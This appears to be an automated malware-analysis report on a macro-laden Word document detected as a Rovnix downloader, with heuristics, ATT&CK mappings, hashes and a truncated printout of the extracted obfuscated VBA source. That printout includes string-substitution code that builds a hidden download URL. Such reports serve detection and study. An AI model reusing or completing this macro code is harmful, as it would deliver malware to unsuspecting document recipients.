MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is an OOXML document containing VBA macros, specifically an Auto_Close macro that utilizes CreateObject. ClamAV identifies this as Doc.Downloader.Rovnix-6497736-0. The VBA code appears to be obfuscated but the presence of Auto_Close and CreateObject strongly suggests it's designed to download and execute a secondary payload.
Heuristics 6
-
ClamAV: Doc.Downloader.Rovnix-6497736-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Rovnix-6497736-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 16292 bytes |
SHA-256: 7fa1ef1c9f7fa9ecde6380b7af91bfbe4e6349a5ca10a599857789a1b7eea7eb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub oXoEzNTogQRdOp()
NOBMRvP = Acos(3899) - Acos(2392) - 385 - 3748 - 1851
vTQrxYvB = 1690 - 2091 - 1161 - 2414 - Acos(4235) - 2031 - 2100
LErPCgRI = Left("nXvuzZHZkG", 3) + "kbnPJPiuGjYrpIS" + Left("jrSRoAxTPU", 2)
wwWRSAip = Left("vOXjVwSPHK", 10) + "zXKqFnZPx"
pZiBiAIr = Left("yIpUKINEXy", 1) + Left("dwITnxqXVx", 6) + "Uo" + "RT" + Left("oPNWwoqPMu", 6) + "vEApRJpPMD"
Application.Run "rUvJZcviixLrBo"
PXifBjqD = 413 + 3223 + Acos(1972)
ckGAbUzfv = "VnwSPZwPvVIB" + "pZcuWFWLUKukYw" + Left("DdBYwQWoSY", 3) + Left("HgAJgDxiDd", 10) + "BbrEFIgiCpLqX"
goWRFgjgccr = Left("PLQIAfIAfb", 2) + Left("BXFgTjPLnv", 3) + "iKcAnrZgJ"
End Sub
Sub pUquKRiHgoAwqC()
oUkkAVAYx = Left("fopxgLPHwK", 9) + "zYyzNG" + Left("JoXoEzNTog", 8) + "prUvJZcviixL"
oPibRCdnSZg = Left("upZNOxXunG", 1) + "qExgfTdIBrI" + Left("VpUquKRiHg", 3) + Left("qCJLxzNkkw", 2) + Left("kUEinydprK", 2) + "SuB"
CNiXrGyZW = Left("EkRGgcWvZd", 1) + "cG"
Application.Run "KDfYWPWWguxxzXx"
QFzvXTjC = 4898 - Acos(3255) - 4960 - Acos(516)
bDbqgxMf = 4251 - Acos(2881)
JQqPQqKA = Acos(1629) + 915 + 25 + 2833
End Sub
Function Acos(X)
Acos = Atn(X) - Atn(1)
End Function
Public Function BoUGToyNfzSbMEGV(GkyTTzgODIwwNIgo, ORBqVBMExDZpbW, gnoKyNrNPYJpBOpQoB)
WCfVxTq = Acos(509) - Acos(4300) - Acos(2234) - 1019 - Acos(2041) - 3353 - Acos(264) - Acos(1396)
dKffYJcqbbU = "ukwBqRuCIKVroMMFxyREYMTWwiVYw" + LTrim("HUvcfDHWF") + RTrim("CxcOFSAWqCwXMCJPEIJUQfkpfGIuD")
LWUkkdnKC = Acos(1545) + Acos(3777) + 296 + Acos(1240)
BoUGToyNfzSbMEGV = Replace(GkyTTzgODIwwNIgo, ORBqVBMExDZpbW, gnoKyNrNPYJpBOpQoB)
RgGIgVUQLUj = Left("IcUVEIWoOo", 8) + "DBYPM" + Left("jBgbAyHVcG", 10) + "WJKHNJggdd" + "MJIO" + Left("ucIqVOcCDg", 1)
AnGXxbwFETjd = 4492 + Acos(4901) + Acos(2797) + 3998 + 4039
VFcNzZDcdZ = 2827 + 3529
gHbLELd = Acos(2858) + Acos(2545) + Acos(3611) + Acos(2362) + Acos(2712)
GFYQzScvSQy = 3635 - 4667 - 2232
TjGfNuS = Left("bZCFNUiOYB", 4) + Left("vTUAHUbfRj", 5)
cYJSjLEY = Acos(4265) + 1304 + 4386 + Acos(4171) + 2913 + 980 + Acos(2600)
uoUURCP = 4888 - Acos(4117) - Acos(1591) - 2301
yccURGEwbd = "uYdOWvI" + Left("nIKVUDWopr", 4)
SOPOvvESF = RTrim("MqWC") + LTrim("PjRgTwPSYnuILzR") + "iNPqHD" + RTrim("ULRvYXQ") + "qjrpgrjkKMCA"
bWSqpvCVz = "ybvj" + "rSbR" + "GQVrgwUn" + "GXqKEnRTKg"
cvbkqgdOR = Left("VAUILZVFiU", 7) + "QbwBGPGSMBv" + "GuBHPdYpWQOoCHX"
ocXApMLinCRO = Acos(895) + Acos(4376) + Acos(2661)
kzQHcDbKR = 4006 - Acos(2607) - Acos(4016) - 4117
DpKdwSBJyJO = 2634 + 1376 + 3929 + Acos(4294) + Acos(4236) + Acos(744) + Acos(1464)
NqIWbPdZAE = "QRSj" + "FNrRDCPAPxpBFqJ" + "ACcUInKQJKLfBBR"
End Function
Sub KDfYWPWWguxxzXx()
DAFYCdUUNN = Acos(4591) + Acos(4434) + Acos(4296) + Acos(3207) + 3236 + 1167
uVNJrHfvnTy = "dDVfyv" + "fvDz" + "PLLKvDzOL"
JBxjEFgkMvq = 332 + 1140 + Acos(2536) + 3443 + 1485 + 4201
HwOIYcENHxfd = RTrim("uIHqIbxGzMBcnPcCVRTqbWj") + LTrim("MSozFYgwgyzIodPWoA") + RTrim("CdQODSFfXDGcVvNE") + "dnOpHouQGi" + RTrim("jMwCyqFHuSgXgrXk")
jUpHiXYozSv = "wUHYBcyOnqQVVbTIyqpJcBZkL" + RTrim("kEiQgZEBTnrDAPkpuPxF") + "NoZiKNVJLyIvIkOXSFx" + LTrim("uYBc") + "PCQTxYbNAofDf"
HcyKSBAnUDWHXcTCOz = "rMBNSQVUQrkyNpDLxgxocPdyhUENDIFWkICZjRbAynoqfJGWY hUENDIFWkICZjUENDIFWkICZjp://qdkngijbqnwrvjFXrdNgSJohiqwrbzudwrvjFXrdNgSJo.corMBNSQVUQrky/REX/NpDLxgxocPdyWBfzpvQqxMQyick.php?uUENDIFWkICZjrMBNSQVUQrkyRbAynoqfJGWY=borMBNSQVUQrkybWBfzpvQqxMQy"
HcyKSBAnUDWHXcTCOz = BoUGToyNfzSbMEGV(HcyKSBAnUDWHXcTCOz, "rMBNSQVUQrky", "m")
LxyiUXTBbURP = Acos(3753) - 620 - Acos(3284) - 519
LwLHbQCQJPE = 3908 + 2302 + Acos(3136)
LwySwUyxb = "BoYvxwIdMzDxEHEpAJbjFP" + "LozqJioDuUWwVu" + RTrim("AGxfKLkHLMPkArWjzDSxHWp")
vQjbUALJE = 91 + 4636 + Acos(1101) + 3352 + 3407 + Acos(4214)
HcyKSBAnUDWHXcTCOz = BoUGToyNfzSbMEGV(HcyKSBAnUDWHXcTCOz, "RbAynoqfJGWY", "
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 43520 bytes |
SHA-256: ef5eafbc1a838212055d2f795bba3ac67b3e5fba6c079372db3c902ef6c33611 |
|||
|
Detection
ClamAV:
Doc.Downloader.Rovnix-6497736-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.